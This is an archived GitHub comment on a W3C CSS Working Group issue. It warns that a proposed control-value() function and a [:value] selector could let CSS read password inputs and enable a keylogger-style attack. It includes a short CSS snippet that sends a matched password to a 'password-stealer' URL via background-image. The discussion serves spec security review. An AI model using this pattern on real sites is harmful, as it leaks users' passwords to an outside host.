- From: Bramus via GitHub <sysbot+gh@w3.org>
- Date: Fri, 04 Apr 2025 12:44:30 +0000
- To: public-css-archive@w3.org
The security aspects of this seems to be only _very lightly_ covered in the WG’s discussion.
There is a _huge_ difference between `attr()` and `control-value()`: the former works with the content attribute and the latter works with the IDL attribute. Content attributes typically don’t change _(there are some exceptions, like `<dialog>`’s `[open]`)_ but IDL attributes do.
So using `attr()` to read back the current value of an `<input type=password>` is not possible _(unless you do two way data-binding, like React typically does)_ but with `control-value()` that door is wide open, enabling a [CSS Keylogger Attack](https://www.bram.us/2018/02/21/css-keylogger-and-why-you-shouldnt-worry-about-it/).
Introducing something like `attr()`-tainting might solve this in order to prevent the values from being used in URLs. But if [the suggested `[:value]` selector](https://github.com/w3c/csswg-drafts/issues/354) comes into existence, `control-value()`-tainting won’t help at all:
```css
input[type="password"][:value="Password1!"] {
background-image: url("https://example.org/password-stealer/Password1!");
}
```
--
GitHub Notification of comment by bramus
Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/7869#issuecomment-2778635884 using your GitHub account
--
Sent via github-notify-ml as configured in https://github.com/w3c/github-notify-ml-config
Received on Friday, 4 April 2025 12:44:30 UTC